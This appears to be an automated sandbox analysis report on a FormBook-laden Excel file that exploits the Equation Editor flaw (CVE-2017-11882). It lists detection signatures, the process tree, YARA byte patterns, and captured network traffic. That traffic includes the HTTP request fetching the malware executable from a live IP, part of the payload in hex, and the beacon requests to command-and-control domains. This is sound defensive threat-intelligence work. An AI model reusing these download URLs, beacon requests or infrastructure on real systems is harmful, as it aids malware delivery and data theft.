Loading ...

Play interactive tourEdit tour

Analysis Report EME_PO.47563.xlsx

Overview

General Information

Sample Name:EME_PO.47563.xlsx
Analysis ID:323358
MD5:3ef301afc6cc945e31ab9c8f4c24b29c
SHA1:fc4f87402b120027927a5303eb3ced1e96f979a4
SHA256:f6feb4b1cb9e6c6df4cab250ed38f0b25d6033ce97a7e68dbf90eb6c49fb1b13
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2196 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2348 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2436 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4A105D55BFF1F7304E01CE7198BADA6B)
      • vbc.exe (PID: 2768 cmdline: {path} MD5: 4A105D55BFF1F7304E01CE7198BADA6B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • explorer.exe (PID: 2792 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
            • cmd.exe (PID: 2804 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2348, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2436
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.227.129.22, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2348, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2348, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2348, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2436
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2348, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2436
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2348, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2436

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://192.227.129.22/vbc.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 25%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 25%
          Multi AV Scanner detection for submitted fileShow sources
          Source: EME_PO.47563.xlsxReversingLabs: Detection: 37%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 00214E5Dh
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.hostingbisniz.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.227.129.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.227.129.22:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.22:49169
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 03:15:59 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Thu, 26 Nov 2020 22:38:57 GMTETag: "7dc00-5b50a35a0744f"Accept-Ranges: bytesContent-Length: 515072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c ca bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 07 00 00 0a 00 00 00 00 00 00 d6 ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ee 07 00 4f 00 00 00 00 00 08 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 00 08 00 00 08 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 da 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 a8 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 0
          Source: global trafficHTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww== HTTP/1.1Host: www.hostingbisniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?u2M0SF6h=6o65y5aQ3K5IIOIZSpB7cm3zMzY8A11b3Xh1T1GzD81isrOpTqP8VmdELK0Vgou9N3EQzw==&rFN0=Xrx4qn HTTP/1.1Host: www.8no3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA== HTTP/1.1Host: www.cna-notary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn HTTP/1.1Host: www.tennessyherb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg== HTTP/1.1Host: www.bestpodstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?u2M0SF6h=OYXdaeXg9F3JN4qYjwOEDyjla/tUwsNCNX4C8lXWM8yJouL0vi1vAZ6NQlgRanHRrjTU7w==&rFN0=Xrx4qn HTTP/1.1Host: www.xjcg168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn HTTP/1.1Host: www.pellatrap.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox ViewASN Name: sun-asnSC sun-asnSC
          Source: Joe Sandbox ViewASN Name: YAHOO-3US YAHOO-3US
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: global trafficHTTP traffic detected: GET /vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.129.22Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.227.129.22
          Source: C:\Windows\explorer.exeCode function: 6_2_02972302 getaddrinfo,setsockopt,recv,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46B6EF3.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.129.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww== HTTP/1.1Host: www.hostingbisniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?u2M0SF6h=6o65y5aQ3K5IIOIZSpB7cm3zMzY8A11b3Xh1T1GzD81isrOpTqP8VmdELK0Vgou9N3EQzw==&rFN0=Xrx4qn HTTP/1.1Host: www.8no3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA== HTTP/1.1Host: www.cna-notary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn HTTP/1.1Host: www.tennessyherb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg== HTTP/1.1Host: www.bestpodstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mz59/?u2M0SF6h=OYXdaeXg9F3JN4qYjwOEDyjla/tUwsNCNX4C8lXWM8yJouL0vi1vAZ6NQlgRanHRrjTU7w==&rFN0=Xrx4qn HTTP/1.1Host: www.xjcg168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
